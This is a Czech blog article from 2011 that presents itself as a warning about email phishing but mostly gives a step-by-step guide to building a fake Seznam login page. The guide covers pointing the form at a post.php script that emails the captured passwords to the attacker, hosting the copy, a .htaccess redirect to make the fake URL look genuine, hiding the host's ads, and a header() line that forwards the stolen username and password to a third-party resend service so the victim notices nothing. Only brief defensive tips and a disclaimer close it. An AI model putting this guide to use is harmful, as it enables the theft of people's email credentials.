Kategorie: IT, Hacking

Hacknutí hesla na e-mail - sociotechnika || na co dávat pozor?

Pomůžete mi hacknout heslo na email? Častá otázka s kterou se setkávám častěji a častěji, přiblížením jednoho z mnoha způsobů "hacknutí" e-mailu bych rád ukázal na jednoduchost a tím vás varoval na chyby, které mnozí z vás dělají. Popíšem si útok sociotechnika...

hack email

Autor: KdoSiOdJinud | Vydáno: 11.12.2011 10:22 | Přečteno: 207917x | Komentářů: 0

Aktualizováno 11.12.2011

"Jen dvě věci na světě jsou nekonečné...Vesmír a lidská hloupost...Tím prvním si ovšem nejsem jist..." Albert Einstein

Budem brát v úvahu, že útočník si vezme prohlášení pana Alberta jako radu a hlouposti lidí (hlouposti vaší) využije. Útok na váš email tedy může probíhat takto: kliknete na odkaz, zobrazí se výzva k přihlášení, přihlásíte se a čtete obsah stránek. VAŠE HESLO BYLO PROZRAZENO!

Hesla typu "Q.q!SaW_2" jsou zbytečná!

    Co útočníkovi stačí:

  • stažená přihlašovací stránka (poslouží k vytvoření fake kopie)
  • šikovně zvolená doména (klidně i druhého řádu, ovšem přesvědčivost klesá)
  • základní znalost php a html (bo bezmyšlenkové stažení níže uvedených kodů :o) lol)
  • šikovnost a využití vaší hlouposti

Jak bude postupovat:

  • jde na přihlašovací stránku a stáhne ji podobně jako na obrázku

    source
  • vytvoří si soubor například post.php a do něj vloží script, který zpracuje přijaté informace z kopie a odešle je například na email, script může vypadat třebas takto - zde
  • otevře si zdrojový kod stažené stránky s loginem a upraví hodnotu atributu action="neco" na action="post.php" viz. obrázek

    source
  • nyní má post.php, složku souborů která vznikla stažením přihlašovací stránky a samotnou přihlašovací stránku
  • přihlásí se na svůj hosting (například na wz.cz ) a soubory tam uploaduje
  • nyní když zadá adresu která mu tímto vznikne www.jehohosting.cz/prihlasovacistranka.htm načte se klasické přihlášení, s tím rozdílem že zadaná hesla odesílá na email a poté přesměrovává na originální stránku...
  • takový odkaz pak může poslat pomocí fake maileru nebo icq

Pár tipů

Umístěním .htaccess s tímto řádkem (umístění musí být v adresáři s login.html) docílíte zobrazení stránky i při "špatně zadané" url. Využití může být pro modifikaci url k zvýšení důvěryhodnosti.

ErrorDocument 404 /login.html

Dále třeba zobrazení reklamy na freehostingu může být nepříjemná věc, stránka pak na první pohled není reálná. Porušení pravidel freehostingů, ale skrytí reklamy dosáhnete umístěním reklamy do tagů div a pomocí css nastavíte display: none. Příklad:

<div style="display: none;"><!--reklama--></div>

Pokud chcete aby bylo přihlašování na fake webu funkční, můžete využít projektu GET2POST a v souboru send.php namísto přesměrování zaslat správné údaje ke skutečnému zpracování. V ukazkových souborech stačí nahradit řádek začínající header tímto:

header("location: http://www.soom.cz/projects/get2post/resend.php?username=".$user."&password=".$pass."&
login=p%C5%99ihl%C3%A1sit+se&serviceid=email&disablessl=0&forcessl=0&lang=cz&logintype=seznam&
returnurl=http%3A%2F%2Femail.seznam.cz%2Fticket&forcerelogin=0&coid=
&uri=https%3A%2F%2Flogin.szn.cz%2FloginProcess&domain=".$dom);

Jak se bránit? Stačí dodržovat tyto zásady:

  • neklikejte na odkazy příchozí z neznámých adres a čísel
  • neklikejte na odkazy které mají podivnou url
  • zbystřete jestliže po vás odkaz vyžaduje heslo
  • čtěte url a uvažujte
  • pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS)

Odkazy

Testovací balík s připravenými soubory pro hesla seznamu (obsahuje v post.php řádek, starající se o informování napadeného uživatele!): SMAZÁNO

Vše slouží k prostudování hrozby přicházející z této strany, vaše počínání jde mimo mou osobu a veškerou odpovědnost tím berete na sebe! Zneužití je trestné!

Komentáře rss

Pokud hledáte službu či máte dotaz mimo téma článku, využijte prosím sekci Nabídky / poptávky.


Nebyly přidány žádné komentáře.